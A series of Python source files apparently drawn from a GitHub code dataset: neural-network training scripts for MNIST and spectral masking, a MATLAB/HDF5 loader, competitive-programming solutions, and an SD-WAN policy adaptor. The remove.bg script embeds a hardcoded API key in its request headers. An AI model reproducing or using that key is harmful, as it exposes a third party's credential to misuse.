learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained ComplexGridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_grid(f=F_GRID_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained GridNet 
with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on FFTNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_fft(f=F_FFT_TRAIN, n_h=[256, 256]):\n \n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_FFT*3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(FFTUnitary, hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained FFTNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nConverts a ComplexNet into a GridNet.\n\nInputs:\n complex_net: the ComplexNet to convert\n f: location to save the GridNet\n rand_S: randomize GridNet structure\n'''\n'''\ndef convert_save_grid_net(complex_net=None, f=None, rand_S=True):\n if complex_net is None:\n complex_net = load_complex()\n\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n\n grid_net = complex_net.to_grid_net(rand_S=rand_S).to(DEVICE)\n acc = get_acc(grid_net)\n print(f'Converted to GridNet with accuracy {acc} with {\"shuffled\" if rand_S else \"ordered\"} singular values.')\n th.save(grid_net.state_dict(), f)\n print(f'Saved GridNet at {f}')\n'''\n\n'''\nTrain the ComplexNet in batches.\n\nInputs:\n n_train: Number of batches to train for\n dir: directory to save batches\n'''\ndef batch_train_complex(n_train, dir = DIR_COMPLEX_TRAIN):\n for _ in range(n_train):\n f = os.path.join(dir, f'{time():.0f}')\n train_complex(f=f)\n\n'''\nConvert a batch trained ComplexNet to a GridNet\n\nInputs:\n dir: directory of batches\n'''\n'''\ndef batch_convert(dir = DIR_COMPLEX_TRAIN):\n for f in glob(os.path.join(dir, '*')):\n net = load_complex(f)\n convert_save_grid_net(net, f=f+'_grid')\n'''\n\n'''\nLoad a ComplexNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_complex(f=F_COMPLEX_TRAIN):\n net = mnist_complex()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'ComplexNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a GridNet from Directory and generate accuracy/confusion matrices.\n\nInputs:\n f: Directory of the model\n rand_S: whether or not to randomize GridNet states\n report_acc: whether or not to generate accuracy/confusion matrices\n\nOutputs:\n The loaded model\n'''\ndef load_grid(f=os.path.join(DIR_TRAINED_MODELS, 'grid_1_layer.pth'), rand_S=True, report_acc=True):\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n net = mnist_ONN()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'GridNetOrdered loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a FFTNet from Directory.\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_fft(f=os.path.join(DIR_TRAINED_MODELS, 'fft_net.pth')):\n net = mnist_ONN(FFTUnitary)\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, 
map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'FFTNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a CGRDNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_cgrd(f=F_CGRD_TRAIN):\n net = mnist_ONN(CGRDUnitary)\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'CGRDNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a Truncated GridNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_trunc_grid(f=os.path.join(DIR_TRAINED_MODELS, 'truncated_grid.pth')):\n net = mnist_grid_truncated()\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'Truncated GridNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\nif __name__ == '__main__':\n #train_complex()\n net = load_grid()\n \n for data, target in mnist_loader(train=False, batch_size=100, shuffle=False):\n continue\n data = data.view(-1, 28**2)\n data, target = data.to(DEVICE), target.to(DEVICE)\n print(th.max(net(data), dim=1))\n","repo_name":"rishab-partha/Quantum-Optical-ConvNet","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
+{"seq_id":"72582360807","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport h5py\nimport time\nimport os, os.path\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\nTRAIN_ROOT = '/media/coc/Dataset/train/'\nTEST_ROOT = '/media/coc/Dataset/test/'\nMATFILE = '/media/coc/Dataset/model-20180124.mat'\nPARTITIONS = 4\n\nBM_BINS = 257\nBM_SPREAD = 24\nHIDDEN_LAYER_WIDTH = 2048\n\nN_EPOCHS = 100\nBATCH_SIZE_INIT = 1000\nLEARN_RATE_INIT = 0.01\nDROPOUT_COEFF = 0.8\nL2_LOSS_COEFF = 0.00\nMOMENTUM_COEFF = 0.9\n\n\n\n\nTRAIN_PARTS = len([name for name in os.listdir(TRAIN_ROOT)])\nTEST_PARTS = len([name for name in os.listdir(TEST_ROOT)])\nprint(TRAIN_PARTS)\nprint(TEST_PARTS)\nrng = np.random.RandomState(842)\n\n\n\n\n\n##########################\n## GRAPH ##\n##########################\nclass Dense:\n\n def __init__(self, in_dim, out_dim, function=lambda x: x):\n self.W = tf.Variable(rng.uniform(low = -0.1, high = 0.1, size=(in_dim, out_dim)).astype('float32'), name='W')\n self.b = tf.Variable(np.zeros([out_dim]).astype('float32'))\n self.function = function\n self.params = [self.W, self.b]\n # self.ae = Autoencoder(in_dim, out_dim, self.W, self.function)\n\n def f_prop(self, x):\n u = tf.matmul(x, self.W) + self.b\n self.z = self.function(u)\n return self.z\n\n # def pretrain(self, x, noise):\n # cost, reconst_x = self.ae.reconst_error(x, noise)\n # return cost, reconst_x\n\n\n\ndef f_props(layers, x):\n for i, layer in enumerate(layers):\n x = layer.f_prop(x)\n if(i != len(layers)-1):\n x = tf.nn.dropout(x, keep_prob)\n return x\n\n\n\n\nlayers = [\n Dense(BM_BINS*BM_SPREAD, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, BM_BINS)\n]\n\nkeep_prob = tf.placeholder(tf.float32)\nx = tf.placeholder(tf.float32, [None, BM_BINS*BM_SPREAD])\nt = tf.placeholder(tf.float32, [None, BM_BINS])\ny = f_props(layers, x)\nlrate_p = tf.placeholder(tf.float32)\nmt_p = tf.placeholder(tf.float32)\n\n# cost = tf.reduce_mean(tf.reduce_sum((y - t)**2, 1))\ncost_op = (tf.reduce_mean(tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=t, logits=y), 1)) + \n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[0].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[1].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[2].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[3].W)))\ntrain_op = tf.train.MomentumOptimizer(learning_rate=lrate_p, momentum=mt_p).minimize(cost_op)\n\n# saver = tf.train.Saver()\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n\n\n\n\n\n##########################\n## PROCESSING ##\n##########################\n\ndef load_dataset_to_mem(path, part_list):\n\n temp = scio.loadmat(path + 't_' + str(part_list[0]) + '.mat')\n spect = np.array(temp['spec'], dtype='float32')\n label = np.array(temp['bm'], dtype='float32')\n del temp\n\n for p_ in range(1, part_list.shape[0]):\n\n temp = scio.loadmat(path + 't_' + str(part_list[p_]) + '.mat')\n temp_spect = np.array(temp['spec'], dtype='float32')\n temp_label = np.array(temp['bm'], dtype='float32')\n \n spect = np.concatenate((spect,temp_spect))\n label = np.concatenate((label,temp_label))\n\n del temp_label\n del temp_spect\n del temp\n\n return spect, label\n\n\n\n\ndef evaluate_cost(spect, label):\n\n cost_value = sess.run(cost_op, feed_dict={x:spect, t:label, keep_prob:1.0})\n return cost_value\n\n\n\n\ndef training():\n\n 
evaluate_cost_opt = 1000000.0\n mt = MOMENTUM_COEFF\n lrate = LEARN_RATE_INIT\n lbs = BATCH_SIZE_INIT\n\n test_datapool, test_labelpool = load_dataset_to_mem(TEST_ROOT, shuffle(range(1,1+TEST_PARTS)))\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n print('[init]: validation cost: %.3f ' % (evaluate_cost_val))\n\n for epoch in range(N_EPOCHS):\n \n # exponential decay (simulated annealing) may converge to 'sharp' global minimum\n # which generalizes poorly. we use hybrid discrete noise scale falling here.\n if epoch >= 20:\n lbs = 2000\n if epoch >= 40:\n lbs = 4000\n if epoch >= 60:\n lbs = 8000\n if epoch >= 70:\n lrate = 0.001\n if epoch >= 80:\n lrate = 0.0001\n if epoch >= 90:\n lrate = 0.00001\n \n time_start = time.time()\n part_list = shuffle(range(1,1+TRAIN_PARTS))\n part_n = len(part_list)\n part_i = 0\n\n part_list_breakout = np.array_split(part_list, PARTITIONS)\n for part_ in part_list_breakout:\n \n train_data, train_label = load_dataset_to_mem(TRAIN_ROOT, part_)\n train_data, train_label = shuffle(train_data, train_label)\n n_batch = train_label.shape[0] // lbs\n\n for i in range(n_batch):\n start = i * lbs\n end = start + lbs\n sess.run(train_op, feed_dict={x:train_data[start:end], t:train_label[start:end], keep_prob:DROPOUT_COEFF, lrate_p:lrate, mt_p:mt})\n\n del train_label\n del train_data \n part_i += 1\n print('...%d/%d'%(part_i,part_n))\n\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n time_end = time.time()\n print('[epoch %i] validation cost = %.3f ' % (epoch + 1, evaluate_cost_val))\n print('[epoch %i] time = %.3f (sec)' % (epoch + 1, time_end - time_start))\n\n if (evaluate_cost_val < evaluate_cost_opt):\n save_dict = {}\n save_dict['W1'] = sess.run(layers[0].W)\n save_dict['b1'] = sess.run(layers[0].b)\n save_dict['W2'] = sess.run(layers[1].W)\n save_dict['b2'] = sess.run(layers[1].b)\n save_dict['W3'] = sess.run(layers[2].W)\n save_dict['b3'] = sess.run(layers[2].b)\n save_dict['W4'] = sess.run(layers[3].W)\n save_dict['b4'] = sess.run(layers[3].b)\n\n scio.savemat(MATFILE, save_dict)\n evaluate_cost_opt = evaluate_cost_val\n print('[epoch %d] model saved' % (epoch + 1))\n\n del test_labelpool\n del test_datapool\n\n\n\n\ntraining()\nsess.close()\n\n\n\n\n\n\n\n\n##########################\n## NOT IN USE ##\n##########################\ndef make_window_buffer(x, neighbor=3):\n m, n = x.shape\n tmp = np.zeros(m * n * (neighbor * 2 + 1), dtype='float32').reshape(m, -1)\n for i in range(2 * neighbor + 1):\n if (i <= neighbor):\n shift = neighbor - i\n tmp[shift:m, i * n: (i + 1) * n] = x[:m - shift]\n for j in range(shift):\n tmp[j, i * n: (i + 1) * n] = x[0, :]\n else:\n shift = i - neighbor\n tmp[:m-shift, i * n: (i+1) * n] = x[shift:m]\n for j in range(shift):\n tmp[m-(j + 1), i * n: (i + 1) * n] = x[m-1, :]\n return tmp\n\ndef Normalize_data(x, mu, std):\n mean_noisy_10 = np.tile(mu, [8])\n std_noisy_10 = np.tile(std, [8])\n tmp = (x-mean_noisy_10)/std_noisy_10\n return np.array(tmp, dtype='float32')\n\ndef Normalize_label(x, mu, std):\n tmp = (x-mu)/std\n return np.array(tmp, dtype='float32')\n\ndef gen_context(x, neighbor, gmu, gstd):\n m = x.shape[0]\n u = make_window_buffer(x, neighbor)\n\n nat = np.zeros([m, 257])\n for k in range(0,7):\n nat += u[:, k*257:(k+1)*257]\n u = np.c_[u, nat/7]\n u = Normalize_data(u, gmu, gstd)\n return u\n# u: np.zeros([m, 257*8])\n\nclass Autoencoder:\n\n def __init__(self, vis_dim, hid_dim, W, function=lambda x: x):\n self.W = W\n self.a = 
tf.Variable(np.zeros(vis_dim).astype('float32'), name='a')\n self.b = tf.Variable(np.zeros(hid_dim).astype('float32'), name='b')\n self.function = function\n self.params = [self.W, self.a, self.b]\n\n def encode(self, x):\n u = tf.matmul(x, self.W) + self.b\n return self.function(u)\n\n def decode(self, x):\n u = tf.matmul(x, tf.transpose(self.W)) + self.a\n return self.function(u)\n\n def f_prop(self, x):\n y = self.encode(x)\n return self.decode(y)\n\n def reconst_error(self, x, noise):\n tilde_x = x * noise\n reconst_x = self.f_prop(tilde_x)\n error = tf.reduce_mean(tf.reduce_sum((x - reconst_x)**2, 1))\n return error, reconst_x\n\n\n\n\n","repo_name":"xia-lixun/dnn","sub_path":"src/python/train-crossentropy-matlab.py","file_name":"train-crossentropy-matlab.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35225274312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pho\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde\nimport h5py\nimport hdf5storage # conda install hdf5storage\nfrom pathlib import Path\n\n# Include using: from Pho_Import_Matlab_Data import import_mat_file, load_mat_file, print_variables\n\nfrom Pho_Import_Matlab_Data.plot_matlab_fig_file import plot_matlab_fig_file\n\n# See https://docs.h5py.org/en/stable/quick.html#quick for more info\n## In short, An HDF5 file is a container for two kinds of objects: datasets, which are array-like collections of data, and groups, which are folder-like containers that hold datasets and other groups. The most fundamental thing to remember when using h5py is:\n#### Groups work like dictionaries, and datasets work like NumPy arrays\n\nenable_print_type_values = True\n\ndef printname(name):\n print(name)\n\ndef print_attrs(name, obj):\n # Create indent\n shift = name.count('/') * ' '\n item_name = name.split(\"/\")[-1] # Get only the last suffix of the path (the variable name)\n if name.startswith(\"#refs#\"):\n # Exclude top level '#refs#' Group\n # print('Skipping #refs# group and its children...')\n # return -1 # Apparently returning a non-None value stops enumeration\n pass\n else:\n if isinstance(obj, h5py.Dataset):\n # obj node is a dataset\n print(': ' + shift + item_name)\n else:\n # obj node is a group\n print(': ' + shift + item_name)\n if enable_print_type_values:\n try:\n for key, val in obj.attrs.items():\n print(shift + ' ' + f\"{key}: {val}\")\n except:\n pass\n\n\n## Import Function Definitions:\n\ndef import_mat_file(mat_file_path):\n print('opening .mat file at {}'.format(mat_file_path))\n f = h5py.File(mat_file_path,'r')\n return f\n # print(f.keys())\n # data_position = f.get(active_variables)\n\n \ndef build_tree_entries(mat_file):\n data = [\n {'level': 0, 'dbID': 77, 'parent_ID': 6, 'short_name': '{}'.format(mat_file), 'long_name': '', 'order': 1, 'pos': 0} ,\n ]\n # f.keys()\n return data\n\n\ndef print_variables(h5pyFile, recurrsively=False):\n # Get the list of keys for the file\n # h5pyFile.keys()\n # h5pyFile.visit(printname)\n h5pyFile.visititems(print_attrs)\n\ndef load_mat_file(mat_file_path):\n out = hdf5storage.loadmat(mat_file_path) # Load all variables by default\n return out\n\n#end\n","repo_name":"CommanderPho/PhoPyMatlabConverter","sub_path":"Pho_Import_Matlab_Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27967151286","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/21735\n# l,k = wow()\n# n_list = [1]+list(wow())\n# cnt = 0\n# visited = [False]*(l+1)\n# def go(index,count,total,visited,record):\n# global k\n# global cnt\n# global l\n# # print(\"start!!\",index)\n# # print(\"record\",record,count)\n# # print(\"start\",index,count,total)\n# if count == k+1:\n# # print(\"wow!!\",index,total,count)\n# # print(visited)\n# if cnt < total:\n# cnt = total\n# return\n# if index <=l:\n# if visited[index] == False:\n# visited[index]=True\n# total+=n_list[index]\n# record.append(total)\n# count+=1\n# go(index+1,count,total,visited,record)\n# go(index+2,count,total//2,visited,record)\n# record.pop()\n# count-=1\n# total-=n_list[index]\n# visited[index]=False\n# else:\n# if cnt < total:\n# cnt = total\n# return\n# go(0,0,0,visited,[])\n# print(cnt)\n\n#https://www.acmicpc.net/problem/26169\n# n_list = [list(wow()) for _ in range(5)]\n# r,l = wow()\n# visited = [[False]*5 for _ in range(5)]\n# for y in range(5):\n# for x in range(5):\n# if n_list[y][x]==-1:\n# visited[y][x]=True\n# check = \"no\"\n# def go(y,x,count,total,visited):\n# global check\n# # print(\"Start\",y,x,count,total)\n# if count == 4:\n# if total >= 2:\n# check = \"yes\"\n# return\n# if total >=2:\n# check = \"yes\"\n# return\n# if 0<=y<=4 and 0<=x<=4:\n# if visited[y][x] == False:\n# visited[y][x]=True\n# if n_list[y][x] == 1:\n# total+=1\n# count+=1\n# go(y+1,x,count,total,visited) \n# go(y-1,x,count,total,visited) \n# go(y,x+1,count,total,visited) \n# go(y,x-1,count,total,visited) \n# count-=1\n# visited[y][x]=False\n# if n_list[y][x]==1:\n# total-=1\n# go(r,l,0,0,visited)\n# print(0 if check==\"no\" else 1)\n\n#https://www.acmicpc.net/problem/25328\nfrom itertools import permutations\na = list(inputing())\nb = list(inputing())\nc = list(inputing())\nk = one()\na = set(permutations(a,r=k))\nb = set(permutations(b,r=k))\nc = set(permutations(c,r=k))\nx,y,z = set(a&b),set(b&c),set(a&c)\nr = set(list(map(\"\".join,(map(sorted,list(x | y|z))))))\nif r:\n r = sorted(list(r))\n print(*r,sep=\"\\n\")\nelse:\n print(-1)\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/2월/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33941340008","text":"# Requires \"requests\" to be installed (see python-requests.org)\nimport requests\npath = input(\"Enter file path\")\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n files={'image_file': open(path, 'rb')},\n data={'size': 'auto'},\n headers={'X-Api-Key': 'BeoTpZimF517Xc2vFsAN1HLY'},\n)\nif response.status_code == requests.codes.ok:\n with open('no-bg.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"abhinavsatheesh/Programming","sub_path":"Python/PythonPrograms/RemoveImageBg.py","file_name":"RemoveImageBg.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21076248226","text":"import os\nimport logging\nimport pprint\nlogging.basicConfig(filename='adaptor.log', level=logging.DEBUG, \\\n datefmt='%a, %d %b %Y %H:%M:%S')\nlogger = logging.getLogger(__name__)\n \n\n\nimport metadata_adaptor.server_errors as err\nimport metadata_adaptor.template_generator as templates\nimport metadata_adaptor.vmanage_functions as vmg\n\nclass api_endpoint:\n\n def __init__(self):\n\n \n #Load config via env vars\n SDWAN_IP = os.environ.get(\"SDWAN_IP\")\n SDWAN_USERNAME = os.environ.get(\"SDWAN_USERNAME\")\n SDWAN_PASSWORD = os.environ.get(\"SDWAN_PASSWORD\")\n MERGE_POLICY = os.environ.get(\"MERGE_POLICY\")\n\n # SDWAN Controller endpoint\n self.api_endpoint = None\n\n # Internal vars \n self.srv_endpoints = {}\n self.app_route_traffic_profiles = {}\n self.data_traffic_profiles = {}\n self.metadata_keys = []\n\n # SDWAN Controller credentials\n self.credentials = {}\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n\n # SDWAN controller login if env vars \n if (SDWAN_IP is not None) and (SDWAN_USERNAME is not None) \\\n and (SDWAN_PASSWORD is not None) and (MERGE_POLICY is not None):\n self.credentials['sdwanControllerIpAddress'] = SDWAN_IP\n self.credentials['user'] = SDWAN_USERNAME\n self.credentials['password'] = SDWAN_PASSWORD\n self.credentials['sdwanMergedPolicyName'] = MERGE_POLICY\n self.post_credentials(self.credentials)\n \n logger.info('Connecting to server %s', SDWAN_IP)\n \n\n def check_config(self):\n\n if self.credentials['sdwanControllerIpAddress'] is None or \\\n self.credentials['user'] is None or \\\n self.credentials['password'] is None:\n logger.error(\"Credentials of SDWAN controller are not defined.\")\n raise err.NoConfigData('Controller credentials user/password or IP')\n \n def test_connection(self):\n if self.api_endpoint.test_disconnect():\n logger.info(\"Connection lost to the SDWAN controller, re-authenticating.\")\n self.post_credentials(self.credentials)\n \n\n \n\n### SDWAN CONTROLLER CREDENTIALS\n\n def get_credentials(self):\n return self.credentials\n\n def post_credentials(self, cred):\n try:\n self.api_endpoint = vmg.rest_api_lib(cred['sdwanControllerIpAddress'], \\\n cred['user'], cred['password'])\n except Exception as e:\n raise e\n self.credentials = cred\n \n\n def delete_credentials(self):\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n### SERVICE ENDPOINTS MANAGEMENT\n \n def get_service_endpoints_by_profile(self, profile):\n \n endpoints =[]\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n endpoints.append(key)\n \n return endpoints\n \n def delete_service_endpoint_by_profile(self, profile):\n \n to_delete = []\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n to_delete.append(key)\n \n for key in to_delete:\n del self.srv_endpoints[key] \n \n\n def get_service_endpoints(self):\n\n temp = []\n for key, profile in self.srv_endpoints.items():\n temp_key = key.split('_')\n temp.append({\n \"ipAddress\": temp_key[0],\n \"portNumber\": temp_key[1],\n \"trafficProfileName\": profile\n })\n return temp\n\n def post_service_endpoint(self, ipAddress, portNumber, profileName):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key in 
self.srv_endpoints.keys():\n msg = \"Ignoring request: the endpoint\" + key + \" is already defined\"\n logger.warning( err.ElementAlreadyDefined(\"post_service_endpoint\", msg))\n error['status'] = 400\n error['title'] = 'ENDPOINT ALREADY DEFINED'\n error['description'] = 'The endpoint IP: ' + ipAddress + ' and port ' + portNumber + ' is already defined. Ignoring this event.'\n return True, error\n \n defined, profile_type = self.is_traffic_profile_defined(profileName)\n if not defined:\n logger.warning(err.CannotFindElement('post_service_endpoint', \\\n 'Traffic profile ' + profileName + ' is not defined, ignoring request.'))\n error['status'] = 400\n error['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error\n \n \n try:\n\n if profile_type == 'AppRoute':\n \n policy_name = self.app_route_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined:\n raise err.CannotFindElement('post_service_endpoint', policy_name)\n \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_approute_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n\n elif profile_type == 'Data':\n \n policy_name = self.data_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined: \n raise err.CannotFindElement('post_service_endpoint', policy_name) \n \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_data_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n \n except err.CannotFindElement as e:\n logger.warning('Ignoring request: Cannot find a policy called %s', e.elem)\n \n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Details: %s', e)\n\n return False, error\n\n def delete_service_endpoint(self, ipAddress, portNumber):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key not in self.srv_endpoints.keys():\n logger.warning(err.CannotFindElement(\"delete_service_endpoint\", \"This endpoint is not defined, ignoring request.\"))\n error['status'] = 400\n error['title'] = 'ENDPOINT NOT FOUND'\n error['description'] = 'Cannot process DELETE event: resource IP ' + ipAddress + ' and port ' + portNumber + ' does not exist. 
Ignoring this event.'\n return True, error\n \n traffic_profile = self.srv_endpoints[key]['trafficProfileName']\n policy_id = self.srv_endpoints[key]['policyId']\n\n try:\n \n if traffic_profile in self.app_route_traffic_profiles.keys():\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n elif traffic_profile in self.data_traffic_profiles.keys(): \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n else:\n\n logger.warning(err.CannotFindElement('delete_service_endpoint', \\\n 'Traffic profile ' + traffic_profile + ' is not defined, ignoring request.'))\n\n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Exception name: %s', repr(e))\n logger.error('Details: %s', e)\n \n return False, error\n \n\n\n def put_service_endpoint(self, ipAddress, portNumber, profileName):\n error_data = {}\n \n #Check if the profile is defined \n profile_defined, profile_type = self.is_traffic_profile_defined(profileName)\n \n if not profile_defined: \n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n \"The traffic profile \" + profileName + \" is not defined, ignoring this request\"))\n error_data['status'] = 400\n error_data['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error_data['description'] = 'The traffic profile ' + profileName + ' is not defined. 
Ignoring this event.'\n return True, error_data\n \n #Check if the policy is defined\n if profile_type == 'AppRoute':\n policyName = self.app_route_traffic_profiles[profileName]['policyName']\n\n else:\n policyName = self.data_traffic_profiles[profileName]['policyName']\n\n policy_defined, _ = self.is_policy_defined(policyName, profile_type)\n \n if not policy_defined:\n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n 'Ignoring request: Cannot find a policy called '+ policyName ))\n return False, error_data\n \n # Do the actual work\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n return error, error_data\n else:\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n return error, error_data\n \n \n\n\n def create_data_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n \n # Collect all endpoint + tunnel info for each profile\n cnwan_seqs = []\n \n \n for name, data in self.data_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'Data')\n if defined: \n\n previous_cnwan_remove.append(data['policyName']) \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, 